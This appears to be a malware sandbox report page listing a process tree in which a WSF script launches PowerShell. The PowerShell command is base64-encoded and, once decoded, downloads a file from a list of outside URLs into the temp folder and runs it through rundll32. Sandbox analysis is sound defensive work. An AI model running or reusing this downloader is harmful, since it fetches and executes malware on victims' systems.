popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Wmh.wsf

    3000

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7ACQASQBuAGMAYQByAG4AYQB0AGUAcwAgAD0AIAAoACIAaAB0AHQAcABzADoALwAvAGEAbgBkAHIAbwBpAGQAcABvAHMAbQBlAC4AYwBvAG0ALwBvAFIANgBCADUASAAxAC8ANgBjAHgAaAB5ACwAaAB0AHQAcABzADoALwAvAGMAaABhAG4AYwBlAHIAeQBsAGEAdwAuAG4AZQB0AC8ASgBnAHoASgBYAC8AVQBiAE0AUQBFAGUAMwAxAFMASAAyACwAaAB0AHQAcABzADoALwAvAGUAcwB0AHUAZABpAG8AdgBpAGMAdABvAHIAcABhAGMAaABlAGMAbwAuAGMAbwBtAC8AWgBrAFcAawBsAC8ASABCAHgASQBWACwAaAB0AHQAcABzADoALwAvAGgAYQB6AG8AbgBjAGgAdQByAGMAaAAuAG8AcgBnAC8AYQB6ADQALwBDAGgAMwBrAGcAegBnAFEARABxACwAaAB0AHQAcABzADoALwAvAG0AeQBhAG4AbQBhAHIAZwBvAGwAZgBmAGUAZABlAHIAYQB0AGkAbwBuAC4AbwByAGcALwBHADIAMgAvADkAdQBHAEUARQAsAGgAdAB0AHAAcwA6AC8ALwBnAG8AbABkAGUAbgBtAG8AdgBpAGUAcwBhAHcAYQByAGQAcwAuAGMAbwBtAC8AawBNAHgALwBwAFQAQwBHAEgATAAwACwAaAB0AHQAcABzADoALwAvAGwAZQBzAGQAZQBsAGkAYwBlAHMAZABlAHkAYQBuAG4AaQBjAGsALgBjAG8AbQAvAEUAbQBGAC8AUQB3AEkANgA3AFIARQAsAGgAdAB0AHAAcwA6AC8ALwBpAG4AdABlAHIAbgBhAHQAaQBvAG4AYQBsAHYAbwBjAGEAbABjAG8AYQBjAGgALgBjAG8AbQAvADMAcQBBAFoAdwAvAHQAYgBUAEEAMAAsAGgAdAB0AHAAcwA6AC8ALwBnAGUAdABiAHUAdAB0AG4ALgBjAG8AbQAvAE0ARABoAC8AdwA2AE4AWgAxAHoAcwAsAGgAdAB0AHAAcwA6AC8ALwB0AGUAbABlAGcAdQBpAGEAbgBkAG8ALgBjAG8AbQAvAGcASABaAG8ANAAvAEUAOQBYAHEAQwBkAG8AaABxAGEALABoAHQAdABwAHMAOgAvAC8AcgBpAGQAZQAxAGEAdAB2AC4AYwBvAG0ALwBJADgAUwBUAFcAcQAvAHEAMAAyAFkAcAAsAGgAdAB0AHAAcwA6AC8ALwBpAG4AZwBlAG4AaQBlAHIAaQBhAGMAYQBtAHAAbwByAGkAZQBnAG8ALgBjAG8AbQAvAFoAYQBPAC8AUQBjAEgAQQBtAHUAeQAsAGgAdAB0AHAAcwA6AC8ALwBmAG8AcgB0AHUAbgBlAC4AdAByAGEAdgBlAGwALwA0AGQAQQBlAC8AQwBRAFkAZQA3AHEAWgBNAFkAagAiACkALgBzAHAAbABpAHQAKAAiACwAIgApADsAZgBvAHIAZQBhAGMAaAAgACgAJABvAGMAdABvAGQAYQBjAHQAeQBsACAAaQBuACAAJABJAG4AYwBhAHIAbgBhAHQAZQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABvAGMAdABvAGQAYQBjAHQAeQBsACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMQA5ACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGUAcgBpAHQAbwBuAGUAYQBsAGwAeQBSAGUAZQBwAGUAcgAuAEUAeABjAGUAcgBjAGkAcwBlAEwAbwBjAG8AbQBhAG4AOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABwAGUAcgBpAHQAbwBuAGUAYQBsAGwAeQBSAGUAZQBwAGUAcgAuAEUAeABjAGUAcgBjAGkAcwBlAEwAbwBjAG8AbQBhAG4AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAAxADAAMAAwADAAMAApACAAewBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAcABlAHIAaQB0AG8AbgBlAGEAbABsAHkAUgBlAGUAcABlAHIALgBFAHgAYwBlAHIAYwBpAHMAZQBMAG8AYwBvAG0AYQBuACwATgBpAGsAbgA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAOwB9AH0A"

      2208

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf